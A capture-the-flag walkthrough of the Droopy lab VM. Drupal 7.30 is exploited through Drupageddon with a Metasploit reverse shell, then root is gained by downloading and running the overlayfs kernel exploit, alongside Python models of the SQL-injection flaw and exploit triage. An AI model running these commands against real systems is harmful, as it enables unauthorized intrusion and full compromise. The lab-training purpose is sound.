Droopy - danielcastropalomares/security GitHub Wiki

Only port 80 is open (a full-range scan first, then service and OS detection on what it found):

root@kali:/tmp# nmap -p- 172.31.255.122 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-15 19:48 CET
Nmap scan report for 172.31.255.122
Host is up (0.00031s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:97:7B:4D (Oracle VirtualBox virtual NIC)

root@kali:/tmp# nmap -A 172.31.255.122
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-15 19:48 CET
Nmap scan report for 172.31.255.122
Host is up (0.00072s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud...
MAC Address: 08:00:27:97:7B:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.72 ms 172.31.255.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.93 seconds

Listing the web directories (dirsearch output from an Osmedeus run, filtered on HTTP 200 responses). Most of the .txt files are shipped by Drupal itself; the 78 KB info.php is worth a look on its own, since a file of that name and size is very likely a phpinfo() page exposing the PHP configuration:

root@kali:/usr/local/src/gitexd-drupalorg-master/drupalorg# cat /usr/local/src/Osmedeus/workspaces/172.31.255.122/directory/172.31.255.122-dirsearch.txt | grep 200
200    87KB  http://172.31.255.122:80/CHANGELOG.txt
200    10KB  http://172.31.255.122:80/includes/
200     7KB  http://172.31.255.122:80/index.php
200    11KB  http://172.31.255.122:80/index.html
200     2KB  http://172.31.255.122:80/INSTALL.mysql.txt
200    78KB  http://172.31.255.122:80/info.php
200     2KB  http://172.31.255.122:80/INSTALL.pgsql.txt
200     3KB  http://172.31.255.122:80/install.php
200    18KB  http://172.31.255.122:80/INSTALL.txt
200    18KB  http://172.31.255.122:80/LICENSE.txt
200     8KB  http://172.31.255.122:80/MAINTAINERS.txt
200   743B   http://172.31.255.122:80/profiles/standard/standard.info
200   271B   http://172.31.255.122:80/profiles/minimal/minimal.info
200   278B   http://172.31.255.122:80/profiles/testing/testing.info
200     5KB  http://172.31.255.122:80/README.txt
200     2KB  http://172.31.255.122:80/robots.txt
200     3KB  http://172.31.255.122:80/scripts/
200     9KB  http://172.31.255.122:80/UPGRADE.txt
200     2KB  http://172.31.255.122:80/web.config
200    42B   http://172.31.255.122:80/xmlrpc.php

Looking at CHANGELOG.txt, we can see that this is Drupal 7.30:

http://172.31.255.122/CHANGELOG.txt
Drupal 7.30, 2014-07-24
-----------------------
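Why 7.30 matters: Drupageddon (CVE-2014-3704) is a SQL injection in Drupal 7's database abstraction layer, fixed in 7.32. When a query placeholder receives an array, DatabaseConnection::expandArguments() (includes/database/database.inc) expands it into one placeholder per element, and before 7.32 the suffix of each new placeholder was the array key, which an attacker controls through POST data such as name[0 ;update ...]=x. The 7.32 fix is a single call to array_values(). The following is an added Python model of that logic, not the page's or Drupal's own code: the CHANGELOG snippet and the login-form payload are constructed, and the query is the simplified shape used in the original advisory rather than the exact query Drupal builds for the login form.

```python
import re

# Constructed sample input in the shape of the CHANGELOG.txt head shown above.
CHANGELOG = "Drupal 7.30, 2014-07-24\n-----------------------\n"

# Simplified query shape for an IN() condition whose placeholder gets an array,
# and a constructed login-form payload: name[0 ;update users set name='admin'#]=x&name[1]=x
QUERY = "SELECT * FROM users WHERE name IN (:name)"
PAYLOAD = {":name": {"0 ;update users set name='admin'#": "x", "1": "x"}}


def changelog_version(text):
    """Return the newest release listed in CHANGELOG.txt as a tuple, e.g. (7, 30)."""
    m = re.search(r"^Drupal (\d+)\.(\d+)", text, re.M)
    if not m:
        raise ValueError("no 'Drupal x.y' line found")
    return int(m.group(1)), int(m.group(2))


def drupageddon_candidate(version):
    """CVE-2014-3704 affects Drupal 7.x before 7.32 (unless patched out of band)."""
    return (7, 0) <= version < (7, 32)


def _expand(query, args, suffixes):
    """Model of expandArguments(): every array-valued placeholder :key becomes
    ':key_<suffix>, :key_<suffix>, ...' in the SQL text.  `suffixes` decides how
    the suffixes are derived from the array; that is the only 7.30/7.32 difference."""
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        new_keys = {f"{key}_{i}": v for i, v in suffixes(data)}
        # PHP: preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query)
        query = re.sub(re.escape(key) + r"\b", lambda _m: ", ".join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


def expand_arguments_7_30(query, args):
    """Vulnerable: the suffix is the array *key*, which the user controls."""
    return _expand(query, args, lambda data: data.items())


def expand_arguments_7_32(query, args):
    """Fixed: array_values() discards the keys, so suffixes are always 0, 1, 2, ..."""
    return _expand(query, args, lambda data: enumerate(data.values()))


SAFE_PLACEHOLDER = re.compile(r"^:[A-Za-z0-9_]+$")


def placeholders_are_safe(args):
    """True when every placeholder name is identifier-like, i.e. nothing from the
    argument keys can have leaked into the SQL text."""
    return all(SAFE_PLACEHOLDER.match(k) for k in args)


if __name__ == "__main__":
    print("CHANGELOG version:", changelog_version(CHANGELOG),
          "vulnerable:", drupageddon_candidate(changelog_version(CHANGELOG)))
    for label, fn in (("7.30", expand_arguments_7_30), ("7.32", expand_arguments_7_32)):
        q, a = fn(QUERY, PAYLOAD)
        print(f"{label}: {q}\n      safe placeholders: {placeholders_are_safe(a)}")
```

Running it shows the 7.30 expansion splicing the attacker's key, SQL and all, into the query text while the 7.32 expansion yields only `:name_0, :name_1`; the placeholder check is the kind of assertion a hardened expandArguments() could enforce regardless of where the keys came from.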

Drupal 7.30 predates 7.32, the release that fixed Drupageddon (CVE-2014-3704), a pre-authentication SQL injection in the database abstraction layer. With Metasploit we run the Drupageddon exploit:

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 172.31.255.122       
RHOST => 172.31.255.122
msf exploit(multi/http/drupal_drupageddon) > 
msf exploit(multi/http/drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 172.31.255.129:4444 
[*] Sending stage (38247 bytes) to 172.31.255.122
[*] Meterpreter session 1 opened (172.31.255.129:4444 -> 172.31.255.122:54249) at 2018-12-16 12:39:12 +0100
shell
meterpreter > shell

We land as the www-data user:

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We upgrade to an interactive TTY with Python's pty module:

python -c 'import pty;pty.spawn("/bin/bash")'
www-data@droopy:/var/www/html$ 

We search for SUID binaries, but find nothing beyond the standard Ubuntu set:

www-data@droopy:/home$ find / -perm -u=s -type f 2>/dev/null 
find / -perm -u=s -type f 2>/dev/null 
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mtr
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/chsh
/bin/ping6
/bin/mount
/bin/su
/bin/umount
/bin/ping
/bin/fusermount

We check the kernel version:

www-data@droopy:/tmp$ uname -a
uname -a
Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

We search for an exploit matching that kernel (3.13.0-43 #72-Ubuntu is an Ubuntu 14.04 kernel, which fits the 3.13.0 < 3.19 range of the overlayfs entries):

root@kali:~# searchsploit linux kernel 3.13
--------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                   |  Path
	                                                                         | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13 - SGID Privilege Escalation                                    | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local  | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local  | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit)         | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Pr | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)  | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC)                            | exploits/linux/dos/31305.c
--------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
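Picking the right row by eye works for eight results, but the step is mechanical: parse the kernel version out of uname -a, parse the version expression in each searchsploit title, and keep the local privilege escalation entries whose range contains the running kernel. The following is an added Python triage script, not part of the original page; the inputs are the uname line and the searchsploit rows shown above (column padding collapsed), and the reading of the titles ("A" or "A/B" as a version prefix, "A < B" as A <= version < B) is my assumption about how Exploit-DB names these ranges.

```python
import re

# Input taken from the page: the target's uname -a and the searchsploit rows.
UNAME = ("Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 "
         "x86_64 x86_64 x86_64 GNU/Linux")

SEARCHSPLOIT = """\
Linux Kernel 3.13 - SGID Privilege Escalation | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit) | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local Pr | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2) | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC) | exploits/linux/dos/31305.c
"""

# "Linux Kernel A", "Linux Kernel A/B" or "Linux Kernel A < B" at the start of a title.
TITLE_RE = re.compile(r"^Linux Kernel (\d+(?:\.\d+)*)(?:/(\d+(?:\.\d+)*))?(?:\s*<\s*(\d+(?:\.\d+)*))?")


def parse_version(text):
    """'3.13.0' -> (3, 13, 0); tuples compare component-wise, which is what we need."""
    return tuple(int(p) for p in text.split("."))


def kernel_version(uname_output):
    """Extract the numeric kernel version from `uname -a` or `uname -r` output."""
    m = re.search(r"\b(\d+\.\d+\.\d+)", uname_output)
    if not m:
        raise ValueError("no kernel version in: " + uname_output)
    return parse_version(m.group(1))


def title_matches(title, version):
    """Does the version expression in a searchsploit title cover `version`?"""
    m = TITLE_RE.match(title)
    if not m:
        return False
    low, alt, high = m.groups()
    if high:  # "A < B": affected from A (inclusive) up to B (exclusive)
        return parse_version(low) <= version < parse_version(high)
    for prefix in (low, alt):  # "A" or "A/B": the title names a release family
        if prefix and version[:len(parse_version(prefix))] == parse_version(prefix):
            return True
    return False


def parse_searchsploit(output):
    """Yield (title, path) pairs from searchsploit's table output."""
    for line in output.splitlines():
        if " | " not in line:
            continue
        title, path = (part.strip() for part in line.split(" | ", 1))
        if path.startswith("exploits/"):
            yield title, path


def candidate_exploits(uname_output, searchsploit_output, local_only=True):
    """Return the Exploit-DB paths whose title range covers the running kernel.
    local_only drops DoS and remote entries, keeping only /local/ privesc."""
    version = kernel_version(uname_output)
    hits = []
    for title, path in parse_searchsploit(searchsploit_output):
        if local_only and "/local/" not in path:
            continue
        if title_matches(title, version):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print("kernel:", ".".join(map(str, kernel_version(UNAME))))
    for path in candidate_exploits(UNAME, SEARCHSPLOIT):
        print("candidate:", path)
```

On this kernel the script keeps the SGID entry, both overlayfs entries and the two CONFIG_X86_X32 writes, and drops the recvmmsg entry (3.13.1 only) and the two DoS rows. The distro qualifier in parentheses is still a manual check: the X32 entries target Ubuntu 13.x, so the overlayfs exploit is the one that matches a 14.04 box.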

We compile the overlayfs exploit (37292.c, CVE-2015-1328) on Kali. Two caveats: the resulting binary is dynamically linked against Kali's glibc, so if it refuses to load on an older target, build it with -static or on the target instead; and 37292.c compiles its helper shared library on the target at runtime (the "creating shared library" step), so the victim needs gcc regardless:

root@kali:~# gcc /usr/share/exploitdb/exploits/linux/local/37292.c -o /tmp/ofs

Since the victim has no scp, we serve the binary with Python's built-in web server (python -m SimpleHTTPServer is Python 2; on Python 3 the equivalent is python3 -m http.server 8000):

root@kali:/tmp# python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
172.31.255.122 - - [17/Dec/2018 21:50:43] "GET /ofs HTTP/1.1" 200 -

Now, on the victim, we download the exploit:

www-data@droopy:/tmp$ wget http://172.31.255.129:8000/ofs
wget http://172.31.255.129:8000/ofs
--2018-12-15 21:24:43--  http://172.31.255.129:8000/ofs
Connecting to 172.31.255.129:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17608 (17K) [application/octet-stream]
Saving to: 'ofs'

     0K .......... .......                                    100% 16.4M=0.001s

2018-12-15 21:24:43 (16.4 MB/s) - 'ofs' saved [17608/17608]

We run it and have root. The output shows how it works: the exploit writes /etc/ld.so.preload pointing at a shared library it compiles in /tmp, then runs a SUID binary so that library is loaded with root privileges. After the run, check that /etc/ld.so.preload and the /tmp artifacts are gone; a leftover preload entry produces loader warnings for every dynamically linked program and is a glaring forensic artifact:

www-data@droopy:/tmp$ chmod +x ofs
chmod +x ofs
www-data@droopy:/tmp$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#